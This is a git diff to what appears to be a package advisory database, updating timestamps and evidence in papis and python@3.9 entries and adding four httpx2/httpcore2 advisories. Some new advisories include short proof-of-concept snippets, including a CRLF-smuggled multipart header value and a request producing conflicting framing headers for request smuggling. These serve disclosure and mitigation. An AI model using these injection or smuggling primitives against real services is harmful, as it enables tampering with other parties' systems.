a/advisories/BREW-papis-CVE-2026-4539.json b/advisories/BREW-papis-CVE-2026-4539.json index 9ac9b64bc7..58bd414356 100644 --- a/advisories/BREW-papis-CVE-2026-4539.json +++ b/advisories/BREW-papis-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-4539", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-45409.json b/advisories/BREW-papis-CVE-2026-45409.json index 9251747be2..6cacafc1ff 100644 --- a/advisories/BREW-papis-CVE-2026-45409.json +++ b/advisories/BREW-papis-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-45409", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-49476.json b/advisories/BREW-papis-CVE-2026-49476.json index 75819c4cf8..145d1cf2d9 100644 --- a/advisories/BREW-papis-CVE-2026-49476.json +++ b/advisories/BREW-papis-CVE-2026-49476.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-49476", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-2wc2-fm75-p42x", "CVE-2026-49476", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "soupsieve", - "subject_version": "2.9.2", - "key": "pkg:pypi/soupsieve@2.9.2", - "resource": "soupsieve" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-49477.json b/advisories/BREW-papis-CVE-2026-49477.json index 4ade6591e2..336f675964 100644 --- a/advisories/BREW-papis-CVE-2026-49477.json +++ b/advisories/BREW-papis-CVE-2026-49477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-49477", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-836r-79rf-4m37", "CVE-2026-49477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "soupsieve", - "subject_version": "2.9.2", - "key": "pkg:pypi/soupsieve@2.9.2", - "resource": "soupsieve" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-7246.json b/advisories/BREW-papis-CVE-2026-7246.json index 32a3c4a851..10730b0d23 100644 --- a/advisories/BREW-papis-CVE-2026-7246.json +++ b/advisories/BREW-papis-CVE-2026-7246.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-7246", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:19:42Z", "upstream": [ "PYSEC-2026-2132", "CVE-2026-7246", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "8.3.3", "resource": "click", - "resource_purl": "pkg:pypi/click@8.4.2" + "resource_purl": "pkg:pypi/click@8.5.0" } } ], @@ -46,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "click", - "subject_version": "8.4.2", - "key": "pkg:pypi/click@8.4.2", + "subject_version": "8.5.0", + "key": "pkg:pypi/click@8.5.0", "resource": "click" } ] diff --git a/advisories/BREW-papis-CVE-2026-84378.json b/advisories/BREW-papis-CVE-2026-84378.json new file mode 100644 index 0000000000..5966a89925 --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84378.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84378", + "published": "2026-09-10T20:21:27Z", + "modified": "2026-09-10T20:21:27Z", + "upstream": [ + "GHSA-f2fp-rgf2-35cp", + "CVE-2026-84378", + "PYSEC-2026-3847" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Quadratic SSE line buffering can cause CPU denial of service", + "details": "### Summary\n\nHTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.\n\n### Details\n\nBefore version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.\n\nThe behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.\n\n### Impact\n\nApplications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.\n\n### Mitigation\n\nUpgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.\n\nIf upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-f2fp-rgf2-35cp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84378" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1071" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1117" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/cbfc0e04ef6507da29ccbb3b9c2e5b23dd693414" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-papis-CVE-2026-84379.json b/advisories/BREW-papis-CVE-2026-84379.json new file mode 100644 index 0000000000..1094ff6ebf --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84379.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84379", + "published": "2026-09-10T20:21:27Z", + "modified": "2026-09-10T20:21:27Z", + "upstream": [ + "GHSA-h4x7-gw46-3wm6", + "CVE-2026-84379", + "PYSEC-2026-3848" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Multipart part header injection via unvalidated file Content-Type and custom headers", + "details": "### Summary\n\nHTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.\n\n### Details\n\nThe three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"https://example.com/upload\",\n headers={\"Content-Type\": \"multipart/form-data; boundary=BOUNDARY\"},\n files={\n \"file\": (\n \"safe.txt\",\n b\"payload\",\n \"text/plain\\r\\nX-Injected: true\",\n )\n },\n)\n\nprint(request.read().decode())\n```\n\nThe generated body contains an attacker-injected part header:\n\n```text\n--BOUNDARY\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.txt\"\nContent-Type: text/plain\nX-Injected: true\n\npayload\n--BOUNDARY--\n```\n\nThe same issue affects names and values in the custom header mapping from the four-element tuple.\n\nField names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.\n\n### Impact\n\nApplications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.\n\nThis does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.\n\nIf upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-h4x7-gw46-3wm6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84379" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1142" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/de96d810ee4e309d118982fe7084a46a2bcd600d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-papis-CVE-2026-84380.json b/advisories/BREW-papis-CVE-2026-84380.json new file mode 100644 index 0000000000..d1c131c367 --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84380.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84380", + "published": "2026-09-10T20:21:27Z", + "modified": "2026-09-10T20:21:27Z", + "upstream": [ + "GHSA-pf96-p4fj-6566", + "CVE-2026-84380", + "PYSEC-2026-3849" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Conflicting Content-Length and Transfer-Encoding headers can be auto-generated", + "details": "### Summary\n\nHTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.\n\n### Details\n\nWhen a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"http://example.com/\",\n headers={\"Transfer-Encoding\": \"chunked\"},\n content=b\"test 123\",\n)\n\nprint(request.headers)\n```\n\nThe request contains both:\n\n```text\nTransfer-Encoding: chunked\nContent-Length: 8\n```\n\nOn an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.\n\nStreaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.\n\n### Impact\n\nAn attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.\n\nDepending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.\n\nIf upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-pf96-p4fj-6566" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84380" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1137" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/829b93a2393212996f613e635261f777d9ec6eab" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-papis-CVE-2026-84381.json b/advisories/BREW-papis-CVE-2026-84381.json new file mode 100644 index 0000000000..daac4d0a00 --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84381.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84381", + "published": "2026-09-10T20:21:26Z", + "modified": "2026-09-10T20:21:26Z", + "upstream": [ + "GHSA-7mj9-2mp8-4m2p", + "CVE-2026-84381", + "PYSEC-2026-3844", + "PYSEC-2026-3845" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpcore2", + "resource_purl": "pkg:pypi/httpcore2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpcore2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpcore2@2.12.0", + "resource": "httpcore2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Secure WebSocket traffic sent without TLS through SOCKS proxies", + "details": "### Summary\n\nhttpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.\n\nThe transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.\n\n### Details\n\nThe synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.\n\nFor example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:\n\n```python\nimport httpx2\n\nwith httpx2.Client(proxy=\"socks5://proxy.example:1080\") as client:\n with client.websocket(\n \"wss://service.example/private?token=query-secret\",\n headers={\"Authorization\": \"Bearer header-secret\"},\n cookies={\"session\": \"cookie-secret\"},\n ) as websocket:\n websocket.send_text(\"private message\")\n```\n\nOn affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:\n\n```text\nGET /private?token=query-secret HTTP/1.1\nHost: service.example\nAuthorization: Bearer header-secret\nCookie: session=cookie-secret\n```\n\nBefore HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.\n\nA normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.\n\nRFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.\n\n### Impact\n\nAn attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.\n\nOnly `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.\n\n### Mitigation\n\nUpgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.\n\nIf upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-7mj9-2mp8-4m2p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84381" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1104" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/fb008dd700b761d955210d9692475c3e2f379453" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-papis-CVE-2026-84382.json b/advisories/BREW-papis-CVE-2026-84382.json new file mode 100644 index 0000000000..2cff0ae5ec --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84382.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84382", + "published": "2026-09-10T20:21:27Z", + "modified": "2026-09-10T20:21:27Z", + "upstream": [ + "GHSA-8xx6-hgc6-gc2m", + "CVE-2026-84382", + "PYSEC-2026-3846" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.12.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Streaming response decompression does not bound peak memory (decompression amplification)", + "details": "### Summary\n\nWhen decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.\n\n### Details\n\nHTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.\n\nAt DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.\n\n### Impact\n\nApplications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-8xx6-hgc6-gc2m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84382" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1126" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/4fd0c70a3f207c618b145934792f791bccfb39f8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.12.0" + } + ] +} diff --git a/advisories/BREW-python@3.9-CVE-2013-1629.json b/advisories/BREW-python@3.9-CVE-2013-1629.json index 0ea001c82a..b896a3f384 100644 --- a/advisories/BREW-python@3.9-CVE-2013-1629.json +++ b/advisories/BREW-python@3.9-CVE-2013-1629.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2013-1629", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-g3p5-fjj9-h8gj", "CVE-2013-1629", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2013-1633.json b/advisories/BREW-python@3.9-CVE-2013-1633.json index b3de61d8f9..77a6afdbcf 100644 --- a/advisories/BREW-python@3.9-CVE-2013-1633.json +++ b/advisories/BREW-python@3.9-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2013-1633", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2013-1888.json b/advisories/BREW-python@3.9-CVE-2013-1888.json index e83755de33..bfcb1a4568 100644 --- a/advisories/BREW-python@3.9-CVE-2013-1888.json +++ b/advisories/BREW-python@3.9-CVE-2013-1888.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2013-1888", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-4gv5-qhvr-36vv", "CVE-2013-1888", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2013-5123.json b/advisories/BREW-python@3.9-CVE-2013-5123.json index 97a60494fb..cdb1c82b67 100644 --- a/advisories/BREW-python@3.9-CVE-2013-5123.json +++ b/advisories/BREW-python@3.9-CVE-2013-5123.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2013-5123", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-c5h8-cq4v-cvfm", "CVE-2013-5123", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2014-8991.json b/advisories/BREW-python@3.9-CVE-2014-8991.json index 8797e6e84d..3b214f6836 100644 --- a/advisories/BREW-python@3.9-CVE-2014-8991.json +++ b/advisories/BREW-python@3.9-CVE-2014-8991.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2014-8991", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-53mr-44pp-crf4", "CVE-2014-8991", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2019-20916.json b/advisories/BREW-python@3.9-CVE-2019-20916.json index 3696629a27..5a9b261b23 100644 --- a/advisories/BREW-python@3.9-CVE-2019-20916.json +++ b/advisories/BREW-python@3.9-CVE-2019-20916.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2019-20916", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-gpvv-69j7-gwj8", "CVE-2019-20916", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2021-3572.json b/advisories/BREW-python@3.9-CVE-2021-3572.json index db90653b46..a4fa7820e2 100644 --- a/advisories/BREW-python@3.9-CVE-2021-3572.json +++ b/advisories/BREW-python@3.9-CVE-2021-3572.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2021-3572", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-5xp3-jfq3-5q8x", "CVE-2021-3572", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - 